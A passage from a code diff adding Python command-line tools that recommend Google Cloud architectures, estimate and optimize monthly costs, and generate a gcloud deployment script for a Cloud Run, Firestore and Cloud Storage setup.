'concurrency': 'Up to 1000 concurrent'
}
},
'database': {
'service': 'Firestore',
'purpose': 'Real-time NoSQL database with offline sync',
'configuration': {
'mode': 'Native mode',
'multi_region': 'nam5 or eur3 for HA',
'security_rules': 'Client-side access control',
'indexes': 'Composite indexes for queries'
}
},
'file_storage': {
'service': 'Cloud Storage (Firebase)',
'purpose': 'User uploads (images, videos, documents)',
'configuration': {
'access': 'Firebase Security Rules',
'resumable_uploads': 'Enabled for large files',
'cdn': 'Automatic via Firebase Hosting CDN'
}
},
'authentication': {
'service': 'Firebase Authentication',
'purpose': 'User management and federation',
'configuration': {
'providers': 'Email, Google, Apple, Phone',
'anonymous_auth': 'Enabled for guest access',
'custom_claims': 'Role-based access control',
'multi_tenancy': 'Supported via Identity Platform'
}
},
'push_notifications': {
'service': 'Firebase Cloud Messaging (FCM)',
'purpose': 'Push notifications to mobile devices',
'configuration': {
'platforms': 'iOS (APNs), Android, Web',
'topics': 'Topic-based group messaging',
'analytics': 'Notification delivery tracking'
}
},
'analytics': {
'service': 'Google Analytics (Firebase)',
'purpose': 'User analytics and event tracking',
'configuration': {
'events': 'Custom and automatic events',
'audiences': 'User segmentation',
'bigquery_export': 'Raw event export to BigQuery'
}
}
},
'estimated_cost': {
'monthly_usd': 40 + (self.expected_users * 0.004),
'breakdown': {
'Cloud Functions': '5-30 USD',
'Firestore': '10-50 USD',
'Cloud Storage': '5-20 USD',
'Identity Platform': '0-15 USD',
'FCM': '0 USD (free)',
'Analytics': '0 USD (free)'
}
},
'pros': [
'Real-time data sync built-in',
'Offline-first support',
'Firebase SDKs for iOS/Android/Web',
'Free tier covers most MVPs',
'Rapid development with Firebase console'
],
'cons': [
'Firestore query limitations',
'Vendor lock-in to Firebase/GCP',
'Cost scaling can be unpredictable',
'Limited server-side control'
],
'scaling_characteristics': {
'users_supported': '1k - 1M',
'requests_per_second': '100 - 100,000',
'scaling_method': 'Automatic (Firebase managed)'
}
}
def _data_pipeline_architecture(self) -> Dict[str, Any]:
"""Serverless data pipeline with BigQuery."""
return {
'pattern_name': 'Serverless Data Pipeline',
'description': 'Scalable data ingestion, processing, and analytics',
'use_case': 'Analytics, IoT data, log processing, ETL, data warehousing',
'services': {
'ingestion': {
'service': 'Pub/Sub',
'purpose': 'Real-time event and data ingestion',
'configuration': {
'throughput': 'Unlimited (auto-scaling)',
'retention': '7 days (configurable to 31 days)',
'ordering': 'Ordering keys for ordered delivery',
'dead_letter': 'Dead letter topic for failed messages'
}
},
'processing': {
'service': 'Dataflow (Apache Beam)',
'purpose': 'Stream and batch data processing',
'configuration': {
'mode': 'Streaming or batch',
'autoscaling': 'Horizontal autoscaling',
'workers': f'{max(1, self.data_size_gb // 20)} initial workers',
'sdk': 'Python or Java Apache Beam SDK'
}
},
'warehouse': {
'service': 'BigQuery',
'purpose': 'Serverless data warehouse and analytics',
'configuration': {
'pricing': 'On-demand ($6.25/TB queried) or slots',
'partitioning': 'By ingestion time or custom field',
'clustering': 'Up to 4 clustering columns',
'streaming_insert': 'Real-time data availability'
}
},
'storage': {
'service': 'Cloud Storage (Data Lake)',
'purpose': 'Raw data lake and archival storage',
'configuration': {
'format': 'Parquet or Avro (columnar)',
'partitioning': 'By date (year/month/day)',
'lifecycle': 'Transition to Coldline after 90 days',
'catalog': 'Dataplex for data governance'
}
},
'visualization': {
'service': 'Looker / Looker Studio',
'purpose': 'Business intelligence dashboards',
'configuration': {
'source': 'BigQuery direct connection',
'refresh': 'Real-time or scheduled',
'sharing': 'Embedded or web dashboards'
}
},
'orchestration': {
'service': 'Cloud Composer (Airflow)',
'purpose': 'Workflow orchestration for batch pipelines',
'configuration': {
'environment': 'Cloud Composer 2 (auto-scaling)',
'dags': 'Python DAG definitions',
'scheduling': 'Cron-based scheduling'
}
}
},
'estimated_cost': {
'monthly_usd': self._calculate_data_pipeline_cost(),
'breakdown': {
'Pub/Sub': '5-30 USD',
'Dataflow': '20-150 USD',
'BigQuery': '10-100 USD (on-demand)',
'Cloud Storage': '5-30 USD',
'Looker Studio': '0 USD (free)',
'Cloud Composer': '300+ USD (if used)'
}
},
'pros': [
'Fully serverless data stack',
'BigQuery scales to petabytes',
'Real-time and batch in same pipeline',
'Cost-effective with on-demand pricing',
'ML integration via BigQuery ML'
],
'cons': [
'Dataflow has steep learning curve (Beam SDK)',
'BigQuery costs based on data scanned',
'Cloud Composer expensive for small workloads',
'Schema evolution requires planning'
],
'scaling_characteristics': {
'events_per_second': '1,000 - 10,000,000',
'data_volume': '1 GB - 1 PB per day',
'scaling_method': 'Automatic (all services auto-scale)'
}
}
def _ml_platform_architecture(self) -> Dict[str, Any]:
"""ML platform architecture with Vertex AI."""
return {
'pattern_name': 'ML Platform',
'description': 'End-to-end machine learning platform',
'use_case': 'Model training, serving, MLOps, feature engineering',
'services': {
'ml_platform': {
'service': 'Vertex AI',
'purpose': 'Training, tuning, and serving ML models',
'configuration': {
'training': 'Custom or AutoML training jobs',
'prediction': 'Online or batch prediction endpoints',
'pipelines': 'Vertex AI Pipelines for MLOps',
'feature_store': 'Vertex AI Feature Store'
}
},
'data': {
'service': 'BigQuery',
'purpose': 'Feature engineering and data exploration',
'configuration': {
'ml': 'BigQuery ML for in-warehouse models',
'export': 'Export to Cloud Storage for training',
'feature_engineering': 'SQL-based transformations'
}
},
'storage': {
'service': 'Cloud Storage',
'purpose': 'Datasets, model artifacts, experiment logs',
'configuration': {
'buckets': 'Separate buckets for data/models/logs',
'versioning': 'Enabled for model artifacts',
'lifecycle': 'Archive old experiment data'
}
},
'triggers': {
'service': 'Cloud Functions',
'purpose': 'Event-driven preprocessing and triggers',
'configuration': {
'triggers': 'Cloud Storage, Pub/Sub, Scheduler',
'preprocessing': 'Data validation and transforms',
'notifications': 'Training completion alerts'
}
},
'monitoring': {
'service': 'Vertex AI Model Monitoring',
'purpose': 'Detect data drift and model degradation',
'configuration': {
'skew_detection': 'Training-serving skew alerts',
'drift_detection': 'Feature drift monitoring',
'alerting': 'Cloud Monitoring integration'
}
}
},
'estimated_cost': {
'monthly_usd': 200 + (self.data_size_gb * 2),
'breakdown': {
'Vertex AI Training': '50-500 USD (GPU dependent)',
'Vertex AI Prediction': '30-200 USD',
'BigQuery': '20-100 USD',
'Cloud Storage': '10-50 USD',
'Cloud Functions': '5-20 USD'
}
},
'pros': [
'End-to-end ML lifecycle management',
'AutoML for rapid prototyping',
'Integrated with BigQuery and Cloud Storage',
'Managed model serving with autoscaling',
'Built-in experiment tracking'
],
'cons': [
'GPU costs can escalate quickly',
'Vertex AI pricing is complex',
'Limited customization vs self-managed',
'Vendor lock-in for model artifacts'
],
'scaling_characteristics': {
'training': 'Multi-GPU, distributed training',
'prediction': '1 - 1000+ replicas',
'scaling_method': 'Automatic endpoint scaling'
}
}
def _multi_region_architecture(self) -> Dict[str, Any]:
"""Multi-region high availability architecture."""
return {
'pattern_name': 'Multi-Region High Availability',
'description': 'Global deployment with disaster recovery',
'use_case': 'Global applications, 99.99% uptime, compliance',
'services': {
'dns': {
'service': 'Cloud DNS',
'purpose': 'Global DNS with health-checked routing',
'configuration': {
'routing_policy': 'Geolocation or weighted routing',
'health_checks': 'HTTP health checks per region',
'failover': 'Automatic DNS failover'
}
},
'cdn': {
'service': 'Cloud CDN',
'purpose': 'Edge caching and acceleration',
'configuration': {
'origins': 'Multiple regional backends',
'cache_modes': 'CACHE_ALL_STATIC or USE_ORIGIN_HEADERS',
'edge_locations': 'Global (100+ locations)'
}
},
'compute': {
'service': 'Multi-region GKE or Cloud Run',
'purpose': 'Active-active deployment across regions',
'configuration': {
'regions': 'us-central1 (primary), europe-west1 (secondary)',
'deployment': 'Cloud Deploy for multi-region rollout',
'traffic_split': 'Global Load Balancer with traffic management'
}
},
'database': {
'service': 'Cloud Spanner or Firestore multi-region',
'purpose': 'Globally consistent database',
'configuration': {
'spanner': 'Multi-region config (nam-eur-asia1)',
'firestore': 'Multi-region location (nam5, eur3)',
'consistency': 'Strong consistency (Spanner) or eventual (Firestore)',
'replication': 'Automatic cross-region replication'
}
},
'storage': {
'service': 'Cloud Storage (dual-region or multi-region)',
'purpose': 'Geo-redundant object storage',
'configuration': {
'location': 'Dual-region (us-central1+us-east1) or multi-region (US)',
'turbo_replication': '15-minute RPO with turbo replication',
'versioning': 'Enabled for critical data'
}
}
},
'estimated_cost': {
'monthly_usd': self._calculate_gke_cost() * 2.0,
'breakdown': {
'Cloud DNS': '5-15 USD',
'Cloud CDN': '20-100 USD',
'Compute (2 regions)': '150-500 USD',
'Cloud Spanner': '500-2000 USD (multi-region)',
'Data transfer (cross-region)': '50-200 USD'
}
},
'pros': [
'Global low latency',
'High availability (99.99%+)',
'Disaster recovery built-in',
'Data sovereignty compliance',
'Automatic failover'
],
'cons': [
'2x+ costs vs single region',
'Cloud Spanner is expensive',
'Complex deployment pipeline',
'Cross-region data transfer costs',
'Operational overhead'
],
'scaling_characteristics': {
'users_supported': '100k - 100M',
'requests_per_second': '10,000 - 10,000,000',
'scaling_method': 'Per-region auto-scaling + global load balancing'
}
}
def _calculate_serverless_cost(self) -> float:
"""Estimate serverless architecture cost."""
requests_per_month = self.requests_per_second * 2_592_000
cloud_run_cost = max(5, (requests_per_month / 1_000_000) * 0.40)
firestore_cost = max(5, self.data_size_gb * 0.18)
cdn_cost = max(5, self.expected_users * 0.008)
storage_cost = max(1, self.data_size_gb * 0.02)
total = cloud_run_cost + firestore_cost + cdn_cost + storage_cost
return min(total, self.budget_monthly)
def _calculate_gke_cost(self) -> float:
"""Estimate GKE microservices architecture cost."""
gke_management = 74.40 # Autopilot cluster fee
pod_cost = max(2, self.expected_users // 5000) * 35
cloud_sql_cost = 120 # db-custom-2-8192 baseline
memorystore_cost = 35 # Basic 1 GB
lb_cost = 25
total = gke_management + pod_cost + cloud_sql_cost + memorystore_cost + lb_cost
return min(total, self.budget_monthly)
def _calculate_data_pipeline_cost(self) -> float:
"""Estimate data pipeline cost."""
pubsub_cost = max(5, self.data_size_gb * 0.5)
dataflow_cost = max(20, self.data_size_gb * 1.5)
bigquery_cost = max(10, self.data_size_gb * 0.02 * 6.25)
storage_cost = self.data_size_gb * 0.02
total = pubsub_cost + dataflow_cost + bigquery_cost + storage_cost
return min(total, self.budget_monthly)
def generate_service_checklist(self) -> list:
"""Generate implementation checklist for recommended architecture."""
architecture = self.recommend_architecture_pattern()
checklist = [
{
'phase': 'Planning',
'tasks': [
'Review architecture pattern and services',
'Estimate costs using GCP Pricing Calculator',
'Define environment strategy (dev, staging, prod)',
'Set up GCP Organization and projects',
'Define labeling strategy for resources'
]
},
{
'phase': 'Foundation',
'tasks': [
'Create VPC with subnets (if using GKE/Compute)',
'Configure Cloud NAT for private resources',
'Set up IAM roles and service accounts',
'Enable Cloud Audit Logs',
'Configure Organization policies'
]
},
{
'phase': 'Core Services',
'tasks': [
f"Deploy {service['service']}"
for service in architecture['services'].values()
]
},
{
'phase': 'Security',
'tasks': [
'Configure firewall rules and VPC Service Controls',
'Enable encryption (Cloud KMS) for all services',
'Set up Cloud Armor WAF rules',
'Configure Secret Manager for credentials',
'Enable Security Command Center'
]
},
{
'phase': 'Monitoring',
'tasks': [
'Create Cloud Monitoring dashboards',
'Set up alerting policies for critical metrics',
'Configure notification channels (email, Slack, PagerDuty)',
'Enable Cloud Trace for distributed tracing',
'Set up log-based metrics and log sinks'
]
},
{
'phase': 'CI/CD',
'tasks': [
'Set up Cloud Build triggers',
'Configure automated testing',
'Implement canary or rolling deployments',
'Set up rollback procedures',
'Document deployment process'
]
}
]
return checklist
def main():
parser = argparse.ArgumentParser(
description='GCP Architecture Designer - Recommends GCP services based on workload requirements'
)
parser.add_argument(
'--input', '-i',
type=str,
help='Path to JSON file with application requirements'
)
parser.add_argument(
'--output', '-o',
type=str,
help='Path to write design output JSON'
)
parser.add_argument(
'--json',
action='store_true',
help='Output as JSON format'
)
parser.add_argument(
'--app-type',
type=str,
choices=['web_application', 'mobile_backend', 'data_pipeline',
'microservices', 'saas_platform', 'ml_platform'],
default='web_application',
help='Application type (default: web_application)'
)
parser.add_argument(
'--users',
type=int,
default=1000,
help='Expected number of users (default: 1000)'
)
parser.add_argument(
'--budget',
type=float,
default=500,
help='Monthly budget in USD (default: 500)'
)
args = parser.parse_args()
if args.input:
try:
with open(args.input, 'r') as f:
requirements = json.load(f)
except FileNotFoundError:
print(f"Error: File '{args.input}' not found.", file=sys.stderr)
sys.exit(1)
except json.JSONDecodeError:
print(f"Error: File '{args.input}' is not valid JSON.", file=sys.stderr)
sys.exit(1)
else:
requirements = {
'application_type': args.app_type,
'expected_users': args.users,
'budget_monthly_usd': args.budget
}
designer = ArchitectureDesigner(requirements)
result = designer.recommend_architecture_pattern()
checklist = designer.generate_service_checklist()
output = {
'architecture': result,
'implementation_checklist': checklist
}
if args.output:
with open(args.output, 'w') as f:
json.dump(output, f, indent=2)
print(f"Design written to {args.output}")
elif args.json:
print(json.dumps(output, indent=2))
else:
print(f"\nRecommended Pattern: {result['pattern_name']}")
print(f"Description: {result['description']}")
print(f"Use Case: {result['use_case']}")
print(f"\nServices:")
for name, svc in result['services'].items():
print(f" - {name}: {svc['service']} ({svc['purpose']})")
print(f"\nEstimated Monthly Cost: ${result['estimated_cost']['monthly_usd']:.2f}")
print(f"\nPros: {', '.join(result['pros'])}")
print(f"Cons: {', '.join(result['cons'])}")
if __name__ == '__main__':
main()

View File

@@ -0,0 +1,465 @@
"""
GCP cost optimization analyzer.
Provides cost-saving recommendations for GCP resources.
"""
import argparse
import json
import sys
from typing import Dict, List, Any
class CostOptimizer:
"""Analyze GCP costs and provide optimization recommendations."""
def __init__(self, current_resources: Dict[str, Any], monthly_spend: float):
"""
Initialize with current GCP resources and spending.
Args:
current_resources: Dictionary of current GCP resources
monthly_spend: Current monthly GCP spend in USD
"""
self.resources = current_resources
self.monthly_spend = monthly_spend
self.recommendations = []
def analyze_and_optimize(self) -> Dict[str, Any]:
"""
Analyze current setup and generate cost optimization recommendations.
Returns:
Dictionary with recommendations and potential savings
"""
self.recommendations = []
potential_savings = 0.0
compute_savings = self._analyze_compute()
potential_savings += compute_savings
storage_savings = self._analyze_storage()
potential_savings += storage_savings
database_savings = self._analyze_database()
potential_savings += database_savings
network_savings = self._analyze_networking()
potential_savings += network_savings
general_savings = self._analyze_general_optimizations()
potential_savings += general_savings
return {
'current_monthly_spend': self.monthly_spend,
'potential_monthly_savings': round(potential_savings, 2),
'optimized_monthly_spend': round(self.monthly_spend - potential_savings, 2),
'savings_percentage': round((potential_savings / self.monthly_spend) * 100, 2) if self.monthly_spend > 0 else 0,
'recommendations': self.recommendations,
'priority_actions': self._prioritize_recommendations()
}
def _analyze_compute(self) -> float:
"""Analyze compute resources (GCE, GKE, Cloud Run)."""
savings = 0.0
gce_instances = self.resources.get('gce_instances', [])
if gce_instances:
idle_count = sum(1 for inst in gce_instances if inst.get('cpu_utilization', 100) < 10)
if idle_count > 0:
idle_cost = idle_count * 50
savings += idle_cost
self.recommendations.append({
'service': 'Compute Engine',
'type': 'Idle Resources',
'issue': f'{idle_count} GCE instances with <10% CPU utilization',
'recommendation': 'Stop or delete idle instances, or downsize to smaller machine types',
'potential_savings': idle_cost,
'priority': 'high'
})
# Check for committed use discounts
on_demand_count = sum(1 for inst in gce_instances if inst.get('pricing', 'on-demand') == 'on-demand')
if on_demand_count >= 2:
cud_savings = on_demand_count * 50 * 0.37 # 37% savings with 1-yr CUD
savings += cud_savings
self.recommendations.append({
'service': 'Compute Engine',
'type': 'Committed Use Discounts',
'issue': f'{on_demand_count} instances on on-demand pricing',
'recommendation': 'Purchase 1-year committed use discounts for predictable workloads (37% savings) or 3-year (55% savings)',
'potential_savings': cud_savings,
'priority': 'medium'
})
# Check for sustained use discounts awareness
short_lived = sum(1 for inst in gce_instances if inst.get('uptime_hours_month', 730) < 200)
if short_lived > 0:
self.recommendations.append({
'service': 'Compute Engine',
'type': 'Scheduling',
'issue': f'{short_lived} instances running <200 hours/month',
'recommendation': 'Use Instance Scheduler to stop dev/test instances outside business hours',
'potential_savings': short_lived * 20,
'priority': 'medium'
})
savings += short_lived * 20
# GKE optimization
gke_clusters = self.resources.get('gke_clusters', [])
for cluster in gke_clusters:
if cluster.get('mode', 'standard') == 'standard':
node_utilization = cluster.get('avg_node_utilization', 100)
if node_utilization < 40:
autopilot_savings = cluster.get('monthly_cost', 500) * 0.30
savings += autopilot_savings
self.recommendations.append({
'service': 'GKE',
'type': 'Cluster Mode',
'issue': f'Standard GKE cluster with <40% node utilization',
'recommendation': 'Migrate to GKE Autopilot to pay only for pod resources, or enable cluster autoscaler',
'potential_savings': autopilot_savings,
'priority': 'high'
})
# Cloud Run optimization
cloud_run_services = self.resources.get('cloud_run_services', [])
for svc in cloud_run_services:
if svc.get('min_instances', 0) > 0 and svc.get('avg_rps', 100) < 1:
min_inst_savings = svc.get('min_instances', 1) * 15
savings += min_inst_savings
self.recommendations.append({
'service': 'Cloud Run',
'type': 'Min Instances',
'issue': f'Service {svc.get("name", "unknown")} has min instances but very low traffic',
'recommendation': 'Set min-instances to 0 for low-traffic services to enable scale-to-zero',
'potential_savings': min_inst_savings,
'priority': 'medium'
})
return savings
def _analyze_storage(self) -> float:
"""Analyze Cloud Storage resources."""
savings = 0.0
gcs_buckets = self.resources.get('gcs_buckets', [])
for bucket in gcs_buckets:
size_gb = bucket.get('size_gb', 0)
storage_class = bucket.get('storage_class', 'STANDARD')
if not bucket.get('has_lifecycle_policy', False) and size_gb > 100:
lifecycle_savings = size_gb * 0.012
savings += lifecycle_savings
self.recommendations.append({
'service': 'Cloud Storage',
'type': 'Lifecycle Policy',
'issue': f'Bucket {bucket.get("name", "unknown")} ({size_gb} GB) has no lifecycle policy',
'recommendation': 'Add lifecycle rule: Transition to Nearline after 30 days, Coldline after 90 days, Archive after 365 days',
'potential_savings': lifecycle_savings,
'priority': 'medium'
})
if storage_class == 'STANDARD' and size_gb > 500:
class_savings = size_gb * 0.006
savings += class_savings
self.recommendations.append({
'service': 'Cloud Storage',
'type': 'Storage Class',
'issue': f'Large bucket ({size_gb} GB) using Standard class',
'recommendation': 'Enable Autoclass for automatic storage class management based on access patterns',
'potential_savings': class_savings,
'priority': 'high'
})
return savings
def _analyze_database(self) -> float:
"""Analyze Cloud SQL, Firestore, and BigQuery costs."""
savings = 0.0
cloud_sql_instances = self.resources.get('cloud_sql_instances', [])
for db in cloud_sql_instances:
if db.get('connections_per_day', 1000) < 10:
db_cost = db.get('monthly_cost', 100)
savings += db_cost * 0.8
self.recommendations.append({
'service': 'Cloud SQL',
'type': 'Idle Resource',
'issue': f'Database {db.get("name", "unknown")} has <10 connections/day',
'recommendation': 'Stop database if not needed, or take a backup and delete',
'potential_savings': db_cost * 0.8,
'priority': 'high'
})
if db.get('utilization', 100) < 30 and not db.get('has_ha', False):
rightsize_savings = db.get('monthly_cost', 200) * 0.35
savings += rightsize_savings
self.recommendations.append({
'service': 'Cloud SQL',
'type': 'Right-sizing',
'issue': f'Cloud SQL instance {db.get("name", "unknown")} has low utilization (<30%)',
'recommendation': 'Downsize to a smaller machine type (e.g., db-custom-2-8192 to db-f1-micro for dev)',
'potential_savings': rightsize_savings,
'priority': 'medium'
})
# BigQuery optimization
bigquery_datasets = self.resources.get('bigquery_datasets', [])
for dataset in bigquery_datasets:
if dataset.get('pricing_model', 'on_demand') == 'on_demand':
monthly_tb_scanned = dataset.get('monthly_tb_scanned', 0)
if monthly_tb_scanned > 10:
slot_savings = (monthly_tb_scanned * 6.25) * 0.30
savings += slot_savings
self.recommendations.append({
'service': 'BigQuery',
'type': 'Pricing Model',
'issue': f'Scanning {monthly_tb_scanned} TB/month on on-demand pricing',
'recommendation': 'Switch to BigQuery editions with slots for predictable costs (30%+ savings at this volume)',
'potential_savings': slot_savings,
'priority': 'high'
})
if not dataset.get('has_partitioning', False):
partition_savings = dataset.get('monthly_query_cost', 50) * 0.50
savings += partition_savings
self.recommendations.append({
'service': 'BigQuery',
'type': 'Table Partitioning',
'issue': f'Tables in {dataset.get("name", "unknown")} lack partitioning',
'recommendation': 'Partition tables by date and add clustering columns to reduce bytes scanned',
'potential_savings': partition_savings,
'priority': 'medium'
})
return savings
def _analyze_networking(self) -> float:
"""Analyze networking costs (egress, Cloud NAT, etc.)."""
savings = 0.0
cloud_nat_gateways = self.resources.get('cloud_nat_gateways', [])
if len(cloud_nat_gateways) > 1:
extra_nats = len(cloud_nat_gateways) - 1
nat_savings = extra_nats * 45
savings += nat_savings
self.recommendations.append({
'service': 'Cloud NAT',
'type': 'Resource Consolidation',
'issue': f'{len(cloud_nat_gateways)} Cloud NAT gateways deployed',
'recommendation': 'Consolidate NAT gateways in dev/staging, or use Private Google Access for GCP services',
'potential_savings': nat_savings,
'priority': 'high'
})
egress_gb = self.resources.get('monthly_egress_gb', 0)
if egress_gb > 1000:
cdn_savings = egress_gb * 0.04 # CDN is cheaper than direct egress
savings += cdn_savings
self.recommendations.append({
'service': 'Networking',
'type': 'CDN Optimization',
'issue': f'High egress volume ({egress_gb} GB/month)',
'recommendation': 'Enable Cloud CDN to serve cached content at lower egress rates',
'potential_savings': cdn_savings,
'priority': 'medium'
})
return savings
def _analyze_general_optimizations(self) -> float:
"""General GCP cost optimizations."""
savings = 0.0
# Log retention
log_sinks = self.resources.get('log_sinks', [])
if not log_sinks:
log_volume_gb = self.resources.get('monthly_log_volume_gb', 0)
if log_volume_gb > 50:
log_savings = log_volume_gb * 0.50 * 0.6
savings += log_savings
self.recommendations.append({
'service': 'Cloud Logging',
'type': 'Log Exclusion',
'issue': f'{log_volume_gb} GB/month of logs without exclusion filters',
'recommendation': 'Create log exclusion filters for verbose/debug logs and route remaining to Cloud Storage via log sinks',
'potential_savings': log_savings,
'priority': 'medium'
})
# Unattached persistent disks
persistent_disks = self.resources.get('persistent_disks', [])
unattached = sum(1 for disk in persistent_disks if not disk.get('attached', True))
if unattached > 0:
disk_savings = unattached * 10 # ~$10/month per 100 GB disk
savings += disk_savings
self.recommendations.append({
'service': 'Compute Engine',
'type': 'Unused Resources',
'issue': f'{unattached} unattached persistent disks',
'recommendation': 'Snapshot and delete unused persistent disks',
'potential_savings': disk_savings,
'priority': 'high'
})
# Static external IPs
static_ips = self.resources.get('static_ips', [])
unused_ips = sum(1 for ip in static_ips if not ip.get('in_use', True))
if unused_ips > 0:
ip_savings = unused_ips * 7.30 # $0.01/hour = $7.30/month
savings += ip_savings
self.recommendations.append({
'service': 'Networking',
'type': 'Unused Resources',
'issue': f'{unused_ips} unused static external IP addresses',
'recommendation': 'Release unused static IPs to avoid hourly charges',
'potential_savings': ip_savings,
'priority': 'high'
})
# Budget alerts
if not self.resources.get('has_budget_alerts', False):
self.recommendations.append({
'service': 'Cloud Billing',
'type': 'Cost Monitoring',
'issue': 'No budget alerts configured',
'recommendation': 'Set up Cloud Billing budgets with alerts at 50%, 80%, 100% of monthly budget',
'potential_savings': 0,
'priority': 'high'
})
# Recommender API
if not self.resources.get('uses_recommender', False):
self.recommendations.append({
'service': 'Active Assist',
'type': 'Visibility',
'issue': 'GCP Recommender not reviewed',
'recommendation': 'Review Active Assist recommendations for right-sizing, idle resources, and committed use discounts',
'potential_savings': 0,
'priority': 'medium'
})
return savings
def _prioritize_recommendations(self) -> List[Dict[str, Any]]:
"""Get top priority recommendations."""
high_priority = [r for r in self.recommendations if r['priority'] == 'high']
high_priority.sort(key=lambda x: x.get('potential_savings', 0), reverse=True)
return high_priority[:5]
def generate_optimization_checklist(self) -> List[Dict[str, Any]]:
"""Generate actionable checklist for cost optimization."""
return [
{
'category': 'Immediate Actions (Today)',
'items': [
'Release unused static IPs',
'Delete unattached persistent disks',
'Stop idle Compute Engine instances',
'Set up billing budget alerts'
]
},
{
'category': 'This Week',
'items': [
'Add Cloud Storage lifecycle policies',
'Create log exclusion filters for verbose logs',
'Right-size Cloud SQL instances',
'Review Active Assist recommendations'
]
},
{
'category': 'This Month',
'items': [
'Evaluate committed use discounts',
'Migrate GKE Standard to Autopilot where applicable',
'Partition and cluster BigQuery tables',
'Enable Cloud CDN for high-egress services'
]
},
{
'category': 'Ongoing',
'items': [
'Review billing reports weekly',
'Label all resources for cost allocation',
'Monitor Active Assist recommendations monthly',
'Conduct quarterly cost optimization reviews'
]
}
]
def main():
parser = argparse.ArgumentParser(
description='GCP Cost Optimizer - Analyzes GCP resources and recommends cost savings'
)
parser.add_argument(
'--resources', '-r',
type=str,
help='Path to JSON file with current GCP resource inventory'
)
parser.add_argument(
'--monthly-spend', '-s',
type=float,
default=1000,
help='Current monthly GCP spend in USD (default: 1000)'
)
parser.add_argument(
'--output', '-o',
type=str,
help='Path to write optimization report JSON'
)
parser.add_argument(
'--json',
action='store_true',
help='Output as JSON format'
)
parser.add_argument(
'--checklist',
action='store_true',
help='Generate optimization checklist'
)
args = parser.parse_args()
if args.resources:
try:
with open(args.resources, 'r') as f:
resources = json.load(f)
except FileNotFoundError:
print(f"Error: File '{args.resources}' not found.", file=sys.stderr)
sys.exit(1)
except json.JSONDecodeError:
print(f"Error: File '{args.resources}' is not valid JSON.", file=sys.stderr)
sys.exit(1)
else:
resources = {}
optimizer = CostOptimizer(resources, args.monthly_spend)
result = optimizer.analyze_and_optimize()
if args.checklist:
result['checklist'] = optimizer.generate_optimization_checklist()
if args.output:
with open(args.output, 'w') as f:
json.dump(result, f, indent=2)
print(f"Report written to {args.output}")
elif args.json:
print(json.dumps(result, indent=2))
else:
print(f"\nGCP Cost Optimization Report")
print(f"{'=' * 40}")
print(f"Current Monthly Spend: ${result['current_monthly_spend']:.2f}")
print(f"Potential Savings: ${result['potential_monthly_savings']:.2f}")
print(f"Optimized Spend: ${result['optimized_monthly_spend']:.2f}")
print(f"Savings Percentage: {result['savings_percentage']}%")
print(f"\nTop Priority Actions:")
for i, action in enumerate(result['priority_actions'], 1):
print(f" {i}. [{action['service']}] {action['recommendation']}")
print(f" Savings: ${action['potential_savings']:.2f}/month")
print(f"\nTotal Recommendations: {len(result['recommendations'])}")
if __name__ == '__main__':
main()

View File

@@ -0,0 +1,835 @@
"""
GCP deployment script generator.
Creates gcloud CLI scripts and Terraform configurations for GCP architectures.
"""
import argparse
import json
import sys
from typing import Dict, Any
class DeploymentManager:
"""Generate GCP deployment scripts and IaC configurations."""
def __init__(self, app_name: str, requirements: Dict[str, Any]):
"""
Initialize with application requirements.
Args:
app_name: Application name (used for resource naming)
requirements: Dictionary with pattern, region, project requirements
"""
self.app_name = app_name.lower().replace(' ', '-')
self.requirements = requirements
self.region = requirements.get('region', 'us-central1')
self.project_id = requirements.get('project_id', 'my-project')
self.pattern = requirements.get('pattern', 'serverless_web')
def generate_gcloud_script(self) -> str:
"""
Generate gcloud CLI deployment script.
Returns:
Shell script as string
"""
if self.pattern == 'serverless_web':
return self._gcloud_serverless_web()
elif self.pattern == 'gke_microservices':
return self._gcloud_gke_microservices()
elif self.pattern == 'data_pipeline':
return self._gcloud_data_pipeline()
else:
return self._gcloud_serverless_web()
def _gcloud_serverless_web(self) -> str:
"""Generate gcloud script for serverless web pattern."""
return f"""#!/bin/bash
# GCP Serverless Web Deployment Script
# Application: {self.app_name}
# Region: {self.region}
# Pattern: Cloud Run + Firestore + Cloud Storage + Cloud CDN
set -euo pipefail
PROJECT_ID="{self.project_id}"
REGION="{self.region}"
APP_NAME="{self.app_name}"
ENVIRONMENT="${{ENVIRONMENT:-dev}}"
echo "=== Deploying $APP_NAME to GCP ($ENVIRONMENT) ==="
# 1. Set project
gcloud config set project $PROJECT_ID
# 2. Enable required APIs
echo "Enabling required APIs..."
gcloud services enable \\
run.googleapis.com \\
firestore.googleapis.com \\
cloudbuild.googleapis.com \\
artifactregistry.googleapis.com \\
secretmanager.googleapis.com \\
compute.googleapis.com \\
monitoring.googleapis.com \\
logging.googleapis.com
# 3. Create Artifact Registry repository
echo "Creating Artifact Registry repository..."
gcloud artifacts repositories create $APP_NAME \\
--repository-format=docker \\
--location=$REGION \\
--description="Docker images for $APP_NAME" \\
|| echo "Repository already exists"
# 4. Build and push container image
echo "Building container image..."
gcloud builds submit \\
--tag $REGION-docker.pkg.dev/$PROJECT_ID/$APP_NAME/$APP_NAME:latest \\
.
# 5. Create Firestore database
echo "Creating Firestore database..."
gcloud firestore databases create \\
--location=$REGION \\
--type=firestore-native \\
|| echo "Firestore database already exists"
# 6. Create service account for Cloud Run
echo "Creating service account..."
SA_NAME="${{APP_NAME}}-run-sa"
gcloud iam service-accounts create $SA_NAME \\
--display-name="$APP_NAME Cloud Run Service Account" \\
|| echo "Service account already exists"
# Grant Firestore access
gcloud projects add-iam-policy-binding $PROJECT_ID \\
--member="serviceAccount:$SA_NAME@$PROJECT_ID.iam.gserviceaccount.com" \\
--role="roles/datastore.user" \\
--condition=None
# Grant Secret Manager access
gcloud projects add-iam-policy-binding $PROJECT_ID \\
--member="serviceAccount:$SA_NAME@$PROJECT_ID.iam.gserviceaccount.com" \\
--role="roles/secretmanager.secretAccessor" \\
--condition=None
# 7. Deploy Cloud Run service
echo "Deploying Cloud Run service..."
gcloud run deploy $APP_NAME-api \\
--image $REGION-docker.pkg.dev/$PROJECT_ID/$APP_NAME/$APP_NAME:latest \\
--region $REGION \\
--platform managed \\
--service-account $SA_NAME@$PROJECT_ID.iam.gserviceaccount.com \\
--memory 512Mi \\
--cpu 1 \\
--min-instances 0 \\
--max-instances 10 \\
--set-env-vars "PROJECT_ID=$PROJECT_ID,ENVIRONMENT=$ENVIRONMENT" \\
--allow-unauthenticated
# 8. Create Cloud Storage bucket for static assets
echo "Creating static assets bucket..."
BUCKET_NAME="${{PROJECT_ID}}-${{APP_NAME}}-static"
